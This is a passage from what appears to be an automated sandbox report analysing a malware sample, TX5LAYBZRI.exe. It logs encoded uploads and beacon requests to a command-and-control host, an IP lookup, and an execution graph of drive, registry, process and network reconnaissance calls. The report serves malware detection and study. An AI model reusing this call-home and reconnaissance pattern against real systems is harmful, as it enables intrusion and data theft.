                                          Data Ascii: dqsyedt8mbCfvQf3f7i+\/wCvr0x+HYUz+8E9\/ssn9Mf57UGhD92RPk2f+1R\/n\/JzTJI32or\/AGf6+X+vr+NPkzJHvd\/9ZL\/5Mf8AT37f\/WpV\/wBXsTzP3kv7z\/Pt7fWuc6Cq+\/y32Jv\/AHvX\/nt\/9f8ADntzTPut8sez975v+t9M9vf8Ks\/dwf4\/9Vnt\/n3qs0fm\/Ij\/ACeb\/rOv4frQaU+vy\/Uhj2
                                          Dec 31, 2024 15:47:04.347860098 CET2472OUTData Raw: 6c 66 59 39 76 70 57 6b 4a 46 4c 42 46 70 4f 6d 78 51 79 6b 6d 61 47 4f 78 74 55 69 6c 4a 4f 53 5a 49 31 69 43 75 53 53 54 6c 67 63 6e 4a 50 4e 56 5c 2f 77 44 68 46 76 44 48 5c 2f 51 75 61 44 5c 2f 34 4a 39 50 38 41 5c 2f 6b 65 70 77 6e 30 54 63
                                          Data Ascii: lfY9vpWkJFLBFpOmxQykmaGOxtUilJOSZI1iCuSSTlgcnJPNV\/wDhFvDH\/QuaD\/4J9P8A\/kepwn0TcLg8RHEx43zOuq+aZTnma4erl2VrC5rmmQ4PFYDJ62Kw6wksPUoYLB1cDShQ9jFc2RZFiacqeNy+GKl0Vvp04+s6c\/8AiG+SYbE5fgM0yjI8bSzXPXjsnyzPcxwWaZzRw2O\/tKlmCr43FYbGReJeMlNYTO87wUva
                                          Dec 31, 2024 15:47:04.391623020 CET34608OUTData Raw: 74 4e 30 44 78 42 34 34 4e 78 34 70 6b 4d 71 6e 78 46 6f 76 30 4e 70 66 67 4c 77 66 6f 73 49 67 30 7a 77 35 6f 39 74 47 46 43 41 66 59 59 5a 6e 32 4c 79 46 38 32 34 45 73 75 30 48 6e 42 66 47 65 65 74 64 41 64 4e 73 54 47 73 52 74 4c 55 78 49 78
                                          Data Ascii: tN0DxB44Nx4pkMqnxFov0NpfgLwfosIg0zw5o9tGFCAfYYZn2LyF824Esu0HnBfGeetdAdNsTGsRtLUxIxZYjbQmNWb7zKhXaGPcgAnvXkZf9DHKKOCwOGr8Z5rhP7Mw0Z5dh8loU8Jgsvzul9TeCz2jCr7Svi8flLwVL+z6+b1cxrVoRpUs7q5xRw+HhS93Mf2gmeVMzx2PwPAGS4meZ42f9p4nPa9TH43Ncir4mrjMbw7jrWw
                                          Dec 31, 2024 15:47:04.443526983 CET1236OUTData Raw: 74 66 6f 66 58 38 2b 50 70 37 30 48 51 52 75 58 61 46 5c 2f 77 44 56 37 50 38 41 57 5c 2f 7a 36 5c 2f 77 43 66 70 6d 71 62 62 47 33 66 4a 48 73 78 35 73 58 6c 78 66 58 32 2b 76 30 78 30 71 35 38 6b 6e 38 65 7a 79 5c 2f 2b 6d 58 2b 66 30 70 6b 6e
                                          Data Ascii: tfofX8+Pp70HQRuXaF\/wDV7P8AW\/z6\/wCfpmqbbG3fJHsx5sXlxfX2+v0x0q58kn8ezy\/+mX+f0pknneXDsT54x\/pXl\/gf1zj2oNKfX5fqVhsbZv8A3fmf5+1e\/WofL83e4+RP+Wvl8wf5\/LHpk09pHZY4XSNEz5vmf\/r+tPkZFjdNnySfuv3UX7iHH8v\/AK1B006n62dt\/wCv684fLT+P\/wBG9R+NHmPlE\/eP
                                          Dec 31, 2024 15:47:06.748404980 CET138INHTTP/1.1 200 OK
                                          server: nginx/1.22.1
                                          date: Tue, 31 Dec 2024 14:47:06 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.54970734.147.147.173807088C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 31, 2024 15:47:07.105252028 CET99OUTGET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                          Host: home.fortth14vs.top
                                          Accept: */*
                                          Dec 31, 2024 15:47:07.711004019 CET353INHTTP/1.1 404 NOT FOUND
                                          server: nginx/1.22.1
                                          date: Tue, 31 Dec 2024 14:47:07 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 207
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.54970834.147.147.173807088C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 31, 2024 15:47:08.040447950 CET172OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                          Host: home.fortth14vs.top
                                          Accept: */*
                                          Content-Type: application/json
                                          Content-Length: 31
                                          Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                          Data Ascii: { "id1": "0", "data": "Done1" }
                                          Dec 31, 2024 15:47:08.759886980 CET353INHTTP/1.1 404 NOT FOUND
                                          server: nginx/1.22.1
                                          date: Tue, 31 Dec 2024 14:47:08 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 207
                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                          Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                          HTTPS Proxied Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.54970434.200.57.1144437088C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-31 14:47:02 UTC52OUTGET /ip HTTP/1.1
                                          Host: httpbin.org
                                          Accept: */*
                                          2024-12-31 14:47:02 UTC224INHTTP/1.1 200 OK
                                          Date: Tue, 31 Dec 2024 14:47:02 GMT
                                          Content-Type: application/json
                                          Content-Length: 31
                                          Connection: close
                                          Server: gunicorn/19.9.0
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: true
                                          2024-12-31 14:47:02 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                          Data Ascii: { "origin": "8.46.123.189"}


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:09:46:58
                                          Start date:31/12/2024
                                          Path:C:\Users\user\Desktop\TX5LAYBZRI.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\TX5LAYBZRI.exe"
                                          Imagebase:0xb90000
                                          File size:4'485'632 bytes
                                          MD5 hash:94DFCBA69551E571570208F53FAC90D6
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:3%
                                            Dynamic/Decrypted Code Coverage:30.4%
                                            Signature Coverage:9.1%
                                            Total number of Nodes:408
                                            Total number of Limit Nodes:47
                                            execution_graph 89683 ba1139 89684 ba1148 89683->89684 89686 ba1527 89684->89686 89688 ba0f69 89684->89688 89691 b9fec0 7 API calls 89684->89691 89686->89688 89692 ba22d0 7 API calls 89686->89692 89689 ba0f00 89688->89689 89693 bcd4d0 6 API calls 89688->89693 89691->89686 89692->89688 89693->89689 89819 b9255d 89863 f19f70 89819->89863 89822 b92589 89823 b925a0 GlobalMemoryStatusEx 89822->89823 89824 b925ec 89823->89824 89865 79400e1 89824->89865 89871 7940222 89824->89871 89877 79402f9 89824->89877 89881 7940361 89824->89881 89885 794023d 89824->89885 89891 794027f 89824->89891 89897 79402b7 89824->89897 89901 7940131 89824->89901 89907 7940308 89824->89907 89911 794014a 89824->89911 89917 7940202 89824->89917 89923 794034e 89824->89923 89927 7940100 89824->89927 89933 7940341 89824->89933 89937 7940386 89824->89937 89941 79402c7 89824->89941 89947 794011a 89824->89947 89953 79401c4 89824->89953 89959 79400d7 89824->89959 89965 79402de 89824->89965 89969 79403d5 89824->89969 89973 7940196 89824->89973 89979 7940268 89824->89979 89985 79401ab 89824->89985 89991 79403ab 89824->89991 89994 794032b 89824->89994 89998 79401ee 89824->89998 90004 794016a 89824->90004 90010 794036f 89824->90010 89864 b9256c GetSystemInfo 89863->89864 89864->89822 89866 79400e8 89865->89866 89867 79402b7 GetLogicalDrives 89866->89867 89868 79402b1 GetLogicalDrives 89867->89868 89870 79403b5 89868->89870 89872 7940226 89871->89872 89873 79402b7 GetLogicalDrives 89872->89873 89874 79402b1 GetLogicalDrives 89873->89874 89876 79403b5 89874->89876 89878 7940311 GetLogicalDrives 89877->89878 89880 79403b5 89878->89880 89882 7940367 GetLogicalDrives 89881->89882 89884 79403b5 89882->89884 89886 794026f 89885->89886 89887 79402b7 GetLogicalDrives 89886->89887 89888 79402b1 GetLogicalDrives 89887->89888 89890 79403b5 89888->89890 89893 794021c 89891->89893 89892 79402b7 GetLogicalDrives 89894 79402b1 GetLogicalDrives 89892->89894 89893->89892 89896 79403b5 89894->89896 89898 79402d1 GetLogicalDrives 89897->89898 89900 79403b5 89898->89900 89902 7940135 89901->89902 89903 79402b7 GetLogicalDrives 89902->89903 89904 79402b1 GetLogicalDrives 89903->89904 89906 79403b5 89904->89906 89908 794032f GetLogicalDrives 89907->89908 89910 79403b5 89908->89910 89912 79400e7 89911->89912 89913 79402b7 GetLogicalDrives 89912->89913 89914 79402b1 GetLogicalDrives 89913->89914 89916 79403b5 89914->89916 89918 7940226 89917->89918 89919 79402b7 GetLogicalDrives 89918->89919 89920 79402b1 GetLogicalDrives 89919->89920 89922 79403b5 89920->89922 89924 7940367 GetLogicalDrives 89923->89924 89926 79403b5 89924->89926 89928 7940127 89927->89928 89929 79402b7 GetLogicalDrives 89928->89929 89930 79402b1 GetLogicalDrives 89929->89930 89932 79403b5 89930->89932 89934 7940345 GetLogicalDrives 89933->89934 89936 79403b5 89934->89936 89938 79403a6 GetLogicalDrives 89937->89938 89940 79403b5 89938->89940 89942 7940294 89941->89942 89944 79402b1 GetLogicalDrives 89941->89944 89943 79402b7 GetLogicalDrives 89942->89943 89943->89944 89946 79403b5 89944->89946 89948 794013f 89947->89948 89949 79402b7 GetLogicalDrives 89948->89949 89950 79402b1 GetLogicalDrives 89949->89950 89952 79403b5 89950->89952 89954 79401c5 89953->89954 89955 79402b7 GetLogicalDrives 89954->89955 89956 79402b1 GetLogicalDrives 89955->89956 89958 79403b5 89956->89958 89960 79400f4 89959->89960 89961 79402b7 GetLogicalDrives 89960->89961 89962 79402b1 GetLogicalDrives 89961->89962 89964 79403b5 89962->89964 89966 79402ef GetLogicalDrives 89965->89966 89968 79403b5 89966->89968 89970 7940377 GetLogicalDrives 89969->89970 89972 79403b5 89969->89972 89970->89972 89974 7940157 89973->89974 89975 79402b7 GetLogicalDrives 89974->89975 89976 79402b1 GetLogicalDrives 89975->89976 89978 79403b5 89976->89978 89980 794026f 89979->89980 89981 79402b7 GetLogicalDrives 89980->89981 89982 79402b1 GetLogicalDrives 89981->89982 89984 79403b5 89982->89984 89986 79401d7 89985->89986 89987 79402b7 GetLogicalDrives 89986->89987 89988 79402b1 GetLogicalDrives 89987->89988 89990 79403b5 89988->89990 89992 79403b0 GetLogicalDrives 89991->89992 89993 79403b5 89991->89993 89992->89993 89995 794032f GetLogicalDrives 89994->89995 89997 79403b5 89995->89997 89999 7940206 89998->89999 90000 79402b7 GetLogicalDrives 89999->90000 90001 79402b1 GetLogicalDrives 90000->90001 90003 79403b5 90001->90003 90005 794019c 90004->90005 90006 79402b7 GetLogicalDrives 90005->90006 90007 79402b1 GetLogicalDrives 90006->90007 90009 79403b5 90007->90009 90011 7940377 GetLogicalDrives 90010->90011 90013 79403b5 90011->90013 90014 c44720 90018 c44728 90014->90018 90015 c44733 90017 c44774 90018->90015 90025 c4476c 90018->90025 90026 c45540 6 API calls 90018->90026 90020 c4482e 90020->90025 90027 c49270 90020->90027 90022 c44860 90032 c44950 90022->90032 90024 c44878 90025->90024 90040 c430a0 6 API calls 90025->90040 90026->90020 90041 c4a440 90027->90041 90029 c49297 90031 c492ab 90029->90031 90074 c4bbe0 6 API calls 90029->90074 90031->90022 90033 c44966 90032->90033 90037 c449c5 90033->90037 90039 c449b9 90033->90039 90076 c4b590 if_indextoname 90033->90076 90035 c44aa0 gethostname 90035->90037 90035->90039 90036 c44a3e 90036->90037 90077 c4bbe0 6 API calls 90036->90077 90037->90025 90039->90035 90039->90037 90040->90017 90070 c4a46b 90041->90070 90042 c4a4db 90043 c4aa03 RegOpenKeyExA 90042->90043 90055 c4ad14 90042->90055 90044 c4aa27 RegQueryValueExA 90043->90044 90045 c4ab70 RegOpenKeyExA 90043->90045 90047 c4aa71 90044->90047 90048 c4aacc RegQueryValueExA 90044->90048 90046 c4ac34 RegOpenKeyExA 90045->90046 90066 c4ab90 90045->90066 90049 c4acf8 RegOpenKeyExA 90046->90049 90069 c4ac54 90046->90069 90047->90048 90053 c4aa85 RegQueryValueExA 90047->90053 90050 c4ab66 RegCloseKey 90048->90050 90051 c4ab0e 90048->90051 90052 c4ad56 RegEnumKeyExA 90049->90052 90049->90055 90050->90045 90051->90050 90058 c4ab1e RegQueryValueExA 90051->90058 90054 c4ad9b 90052->90054 90052->90055 90057 c4aab3 90053->90057 90056 c4ae16 RegOpenKeyExA 90054->90056 90055->90029 90059 c4ae34 RegQueryValueExA 90056->90059 90060 c4addf RegEnumKeyExA 90056->90060 90057->90048 90063 c4ab4c 90058->90063 90061 c4af43 RegQueryValueExA 90059->90061 90073 c4adaa 90059->90073 90060->90055 90060->90056 90062 c4b052 RegQueryValueExA 90061->90062 90061->90073 90065 c4adc7 RegCloseKey 90062->90065 90062->90073 90063->90050 90065->90060 90066->90046 90067 c4a794 GetBestRoute2 90067->90070 90068 c4afa0 RegQueryValueExA 90068->90073 90069->90049 90070->90042 90070->90067 90071 c4a6c7 GetBestRoute2 90070->90071 90072 c4a520 90070->90072 90071->90070 90072->90042 90075 c4b830 if_indextoname 90072->90075 90073->90061 90073->90062 90073->90065 90073->90068 90074->90031 90075->90042 90076->90036 90077->90039 89694 b929ff FindFirstFileA 89695 b92a31 89694->89695 89696 b92a5c RegOpenKeyExA 89695->89696 89697 b92a93 89696->89697 89698 b92ade CharUpperA 89697->89698 89700 b92b0a 89698->89700 89699 b92bf9 QueryFullProcessImageNameA 89701 b92c3b CloseHandle 89699->89701 89700->89699 89702 b92c64 89701->89702 89703 b92df1 CloseHandle 89702->89703 89704 b92e23 89703->89704 90078 b93d5e 90083 b93d30 90078->90083 90079 b93d90 90087 b9fcb0 7 API calls 90079->90087 90082 b93dc1 90083->90078 90083->90079 90084 ba0ab0 90083->90084 90088 ba05b0 90084->90088 90086 ba0acd 90086->90083 90087->90082 90089 ba05bd 90088->90089 90092 ba07c7 90088->90092 90090 ba0707 WSAEventSelect 90089->90090 90091 ba07ef 90089->90091 90089->90092 90098 b976a0 90089->90098 90090->90089 90090->90092 90091->90092 90093 ba6fa0 select 90091->90093 90097 ba0847 90091->90097 90092->90086 90093->90097 90095 ba09e8 WSAEnumNetworkEvents 90096 ba09d0 WSAEventSelect 90095->90096 90095->90097 90096->90095 90096->90097 90097->90092 90097->90095 90097->90096 90099 b976c0 90098->90099 90100 b976e6 send 90098->90100 90099->90100 90101 b976c9 90099->90101 90100->90101 90101->90089 89705 bc6ab0 89706 bc6ad5 89705->89706 89707 bc6bb4 89706->89707 89714 ba6fa0 89706->89714 89708 c45ed0 9 API calls 89707->89708 89710 bc6ba9 89708->89710 89711 bc6b54 89711->89707 89711->89710 89712 bc6b5d 89711->89712 89712->89710 89718 c45ed0 89712->89718 89715 ba6fd4 89714->89715 89717 ba6feb 89714->89717 89716 ba7207 select 89715->89716 89715->89717 89716->89717 89717->89711 89721 c45a50 89718->89721 89720 c45ee5 89720->89712 89722 c45a58 89721->89722 89726 c45ea0 89721->89726 89723 c45b50 89722->89723 89733 c45a99 89722->89733 89734 c45b88 89722->89734 89727 c45eb4 89723->89727 89728 c45b7a 89723->89728 89723->89734 89724 c45e96 89761 c59480 6 API calls 89724->89761 89726->89720 89730 c46f10 7 API calls 89727->89730 89744 c470a0 89728->89744 89731 c45ec2 89730->89731 89731->89731 89733->89734 89737 c470a0 7 API calls 89733->89737 89751 c46f10 89733->89751 89738 c45cae 89734->89738 89759 c45ef0 socket ioctlsocket setsockopt connect getsockname 89734->89759 89737->89733 89738->89724 89740 c5a920 89738->89740 89760 c59320 6 API calls 89738->89760 89741 c5a944 89740->89741 89742 c5a977 send 89741->89742 89743 c5a94b 89741->89743 89742->89738 89743->89738 89745 c470ae 89744->89745 89747 c4717f 89745->89747 89749 c471a7 89745->89749 89762 c5a8c0 89745->89762 89766 c471c0 89745->89766 89747->89749 89775 c59320 6 API calls 89747->89775 89749->89734 89752 c46f35 89751->89752 89753 c47019 89752->89753 89803 c5a870 89752->89803 89756 c4701d 89753->89756 89807 c59320 6 API calls 89753->89807 89756->89733 89757 c46f4e 89757->89753 89757->89756 89758 c471c0 5 API calls 89757->89758 89758->89757 89759->89734 89760->89738 89761->89726 89763 c5a8e6 89762->89763 89764 c5a903 recvfrom 89762->89764 89763->89764 89765 c5a8ed 89763->89765 89764->89765 89765->89745 89772 c471e6 89766->89772 89768 c4734e 89770 c473c9 89768->89770 89771 c473e3 89768->89771 89774 c471f2 89768->89774 89770->89774 89780 c46050 89770->89780 89771->89774 89786 c45ef0 socket ioctlsocket setsockopt connect getsockname 89771->89786 89772->89774 89776 c5bc80 89772->89776 89774->89745 89775->89749 89777 c5bca1 89776->89777 89778 c5bcf1 89777->89778 89787 c45ef0 socket ioctlsocket setsockopt connect getsockname 89777->89787 89778->89768 89781 c460d9 89780->89781 89788 c5aa30 89781->89788 89783 c462fc 89784 c46050 5 API calls 89783->89784 89785 c46506 89783->89785 89784->89785 89785->89774 89786->89774 89787->89778 89790 c5aa5f 89788->89790 89789 c5ab96 socket 89791 c5ab75 89789->89791 89799 c5ab04 89789->89799 89790->89789 89790->89791 89790->89799 89792 c5abd0 ioctlsocket 89791->89792 89796 c5ad2e 89791->89796 89791->89799 89795 c5abef 89792->89795 89793 c5ada0 connect 89793->89796 89794 c5ad0a setsockopt 89794->89796 89794->89799 89795->89794 89795->89796 89795->89799 89796->89793 89797 c5ade1 89796->89797 89796->89799 89797->89799 89800 c5af70 89797->89800 89799->89783 89801 c5af93 getsockname 89800->89801 89802 c5af8d 89800->89802 89801->89802 89802->89799 89804 c5a88c 89803->89804 89805 c5a8aa recv 89803->89805 89804->89805 89806 c5a893 89804->89806 89805->89757 89806->89757 89807->89756 89808 bc95b0 89809 bc95c8 89808->89809 89810 bc95fd 89808->89810 89809->89810 89812 bca150 89809->89812 89813 bca15f 89812->89813 89815 bca1d0 89812->89815 89814 bca181 getsockname 89813->89814 89813->89815 89814->89815 89815->89810 90102 bc8b50 90103 bc8b6b 90102->90103 90104 bc8bb5 90102->90104 90103->90104 90105 bc8b8f 90103->90105 90106 bc8bf3 90103->90106 90137 ba6e40 select 90105->90137 90122 bca550 90106->90122 90109 bc8bfc 90109->90104 90112 bc8c1f connect 90109->90112 90113 bc8c35 90109->90113 90115 bc8cb2 90109->90115 90110 bc8ba1 90110->90104 90111 bc8cd9 SleepEx 90110->90111 90110->90115 90118 bc8d13 90111->90118 90112->90113 90119 bca150 getsockname 90113->90119 90114 bca150 getsockname 90117 bc8dff 90114->90117 90115->90104 90115->90114 90115->90117 90117->90104 90138 b978b0 closesocket 90117->90138 90118->90115 90120 bc8d43 90118->90120 90119->90110 90121 bca150 getsockname 90120->90121 90121->90104 90123 bca575 90122->90123 90126 bca597 90123->90126 90140 b975e0 90123->90140 90125 b978b0 closesocket 90128 bca713 90125->90128 90127 bca811 setsockopt 90126->90127 90133 bca83b 90126->90133 90135 bca69b 90126->90135 90127->90133 90128->90109 90130 bcaf56 90131 bcaf5d 90130->90131 90130->90135 90131->90128 90132 bca150 getsockname 90131->90132 90132->90128 90133->90135 90136 bcabe1 90133->90136 90146 bc6be0 10 API calls 90133->90146 90135->90125 90135->90128 90136->90135 90145 bf67e0 ioctlsocket 90136->90145 90137->90110 90139 b978c5 90138->90139 90139->90104 90141 b975ef 90140->90141 90142 b97607 socket 90140->90142 90141->90142 90144 b97643 90141->90144 90143 b9762b 90142->90143 90143->90126 90144->90126 90145->90130 90146->90136 90147 b931d7 90150 b931f4 90147->90150 90148 b93200 90149 b932dc CloseHandle 90149->90148 90150->90148 90150->90149 90151 b92f17 90159 b92f2c 90151->90159 90152 b931d3 90153 b92fb3 RegOpenKeyExA 90153->90159 90154 b9315c RegEnumKeyExA 90155 b931b2 RegCloseKey 90154->90155 90154->90159 90155->90159 90156 b93046 RegOpenKeyExA 90157 b93089 RegQueryValueExA 90156->90157 90156->90159 90158 b9313b RegCloseKey 90157->90158 90157->90159 90158->90159 90159->90152 90159->90153 90159->90154 90159->90156 90159->90158 90160 b913c9 90162 b91160 90160->90162 90163 b913a1 90162->90163 90164 f18a20 isxdigit 90162->90164 90164->90162 90165 79803aa 90166 79803ba Process32FirstW 90165->90166 90168 798040c 90166->90168 90169 105fa30 90171 105fa5a 90169->90171 90170 105fa66 90171->90170 90174 f212c0 90171->90174 90173 105fa9a 90175 f212cc 90174->90175 90178 f1e050 90175->90178 90177 f212fa 90177->90173 90179 f1e09d 90178->90179 90180 f1feb6 isxdigit 90179->90180 90181 f1e18e 90179->90181 90180->90179 90181->90177 89816 bad5e0 89817 bad652 WSAStartup 89816->89817 89818 bad5f0 89816->89818 89817->89818 90182 bce400 90183 bce412 90182->90183 90185 bce459 90182->90185 90186 bc68b0 6 API calls 90183->90186 90186->90185 90187 bcb400 90188 bcb40b 90187->90188 90189 bcb425 90187->90189 90192 b97770 90188->90192 90190 bcb421 90193 b97790 90192->90193 90194 b977b6 recv 90192->90194 90193->90194 90195 b97799 90193->90195 90194->90195 90195->90190 90196 bcb3c0 90197 bcb3ee 90196->90197 90198 bcb3cb 90196->90198 90200 b976a0 send 90198->90200 90202 bc9290 90198->90202 90199 bcb3ea 90200->90199 90203 b976a0 send 90202->90203 90204 bc92e5 90203->90204 90205 bc9335 WSAIoctl 90204->90205 90206 bc9392 90204->90206 90205->90206 90207 bc9366 90205->90207 90206->90199 90207->90206 90208 bc9371 setsockopt 90207->90208 90208->90206

                                            Executed Functions

                                            Function 00BCF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            • Associated: 00000000.00000002.2137549440.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2137568261.00000000012D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138452275.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.00000000012DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000157A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.000000000165B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001662000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138468691.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138724514.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138830242.000000000182B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2138846251.000000000182D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                            • API String ID: 0-1590685507
                                            • Opcode ID: 2cdbfa19e3e6471a6a4e455fe2cb30915f09fba9c4dfd55e9882787d49caa964
                                            • Instruction ID: bbf000a328c9486db86abf30bdfff6354d5ffebf9a8920156fb94b7032acad2d
                                            • Opcode Fuzzy Hash: 2cdbfa19e3e6471a6a4e455fe2cb30915f09fba9c4dfd55e9882787d49caa964
                                            • Instruction Fuzzy Hash: D2C2BF31A043459FD724DF29C484B6AB7E2FF84314F19C6ADEC999B262D770E984CB81
                                            Function 00B9255D Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 282fileCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1185 b9255d-b92614 call f19f70 GetSystemInfo call 1061cf0 call 1061ee0 GlobalMemoryStatusEx call 1061cf0 call 1061ee0 1267 b92619 call 79403d5 1185->1267 1268 b92619 call 7940196 1185->1268 1269 b92619 call 79400d7 1185->1269 1270 b92619 call 79402de 1185->1270 1271 b92619 call 794011a 1185->1271 1272 b92619 call 79401c4 1185->1272 1273 b92619 call 7940386 1185->1273 1274 b92619 call 79402c7 1185->1274 1275 b92619 call 7940100 1185->1275 1276 b92619 call 7940341 1185->1276 1277 b92619 call 7940202 1185->1277 1278 b92619 call 794034e 1185->1278 1279 b92619 call 7940308 1185->1279 1280 b92619 call 794014a 1185->1280 1281 b92619 call 79402b7 1185->1281 1282 b92619 call 7940131 1185->1282 1283 b92619 call 794023d 1185->1283 1284 b92619 call 794027f 1185->1284 1285 b92619 call 79402f9 1185->1285 1286 b92619 call 7940361 1185->1286 1287 b92619 call 79400e1 1185->1287 1288 b92619 call 7940222 1185->1288 1289 b92619 call 79401ee 1185->1289 1290 b92619 call 794036f 1185->1290 1291 b92619 call 7940268 1185->1291 1292 b92619 call 794016a 1185->1292 1293 b92619 call 79403ab 1185->1293 1294 b92619 call 794032b 1185->1294 1295 b92619 call 79401ab 1185->1295 1196 b9261b-b92620 1197 b9277c-b92904 call 1061cf0 call 1061ee0 KiUserCallbackDispatcher call 1061cf0 call 1061ee0 call 1061cf0 call 1061ee0 call f18e38 call f18be0 call f18bd0 FindFirstFileW 1196->1197 1198 b92626-b92637 call 1061af0 1196->1198 1245 b92928-b9292c 1197->1245 1246 b92906-b92926 FindNextFileW 1197->1246 1203 b92754-b9275c 1198->1203 1205 b9263c-b9264f GetDriveTypeA 1203->1205 1206 b92762-b92777 call 1061ee0 1203->1206 1208 b92743-b92751 call f18b98 1205->1208 1209 b92655-b92685 GetDiskFreeSpaceExA 1205->1209 1206->1197 1208->1203 1209->1208 1212 b9268b-b9273e call 1061dc0 call 1061e50 call 1061ee0 call 1061be0 call 1061ee0 call 1061be0 call 1061ee0 call 1060250 1209->1212 1212->1208 1247 b9292e 1245->1247 1248 b92932-b9296f call 